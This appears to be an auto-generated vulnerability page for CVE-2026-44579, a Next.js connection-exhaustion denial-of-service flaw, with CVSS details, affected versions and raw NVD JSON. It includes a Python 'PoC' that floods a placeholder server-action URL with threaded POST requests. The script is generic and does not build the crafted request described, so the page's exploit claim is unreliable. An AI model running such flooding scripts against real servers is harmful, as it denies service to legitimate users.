Security Vulnerability Report
CVE-2026-44579 CVSS 7.5 HIGH

Published: 2026-05-13 18:16:18
Last Modified: 2026-05-14 18:34:05

Description

Next.js is a React framework for building full-stack web applications. From to before 15.5.16 and 16.2.5, applications using Partial Prerendering through the Cache Components feature can be vulnerable to connection exhaustion through crafted POST requests to a server action. In affected configurations, a malicious request can trigger a request-body handling deadlock that leaves connections open for an extended period, consuming file descriptors and server capacity until legitimate users are denied service. This vulnerability is fixed in 15.5.16 and 16.2.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE (Next.js >= 15.0.0, < 15.5.16)
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE (Next.js >= 16.0.0, < 16.2.5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import threading
import time

# Target URL (Replace with actual target)
target_url = "http://target-nextjs-app.com/api/action"

# Send malicious request to trigger deadlock
def send_attack():
    try:
        # Sending a crafted POST request
        # Adjust headers/body based on specific vulnerability requirements
        response = requests.post(target_url, data={"key": "value"}, timeout=10)
        print(f"Request sent, status: {response.status_code}")
    except Exception as e:
        print(f"Error: {e}")

# Launch multiple threads to exhaust connections
threads = []
for i in range(100):
    t = threading.Thread(target=send_attack)
    t.start()
    threads.append(t)

for t in threads:
    t.join()

References

https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx (Mitigation, Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44579", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:18.123", "lastModified": "2026-05-14T18:34:04.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. From to before 15.5.16 and 16.2.5, applications using Partial Prerendering through the Cache Components feature can be vulnerable to connection exhaustion through crafted POST requests to a server action. In affected configurations, a malicious request can trigger a request-body handling deadlock that leaves connections open for an extended period, consuming file descriptors and server capacity until legitimate users are denied service. This vulnerability is fixed in 15.5.16 and 16.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.0.0", "versionEndExcluding": "15.5.16", "matchCriteriaId": "1816CFE7-5E48-40EB-8BB8-F640A1F1C3ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.2.5", "matchCriteriaId": "27C5CF7A-7A33-4BE4-B8FD-10BFD813204A"}]}]}], "references": [{"url": "https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}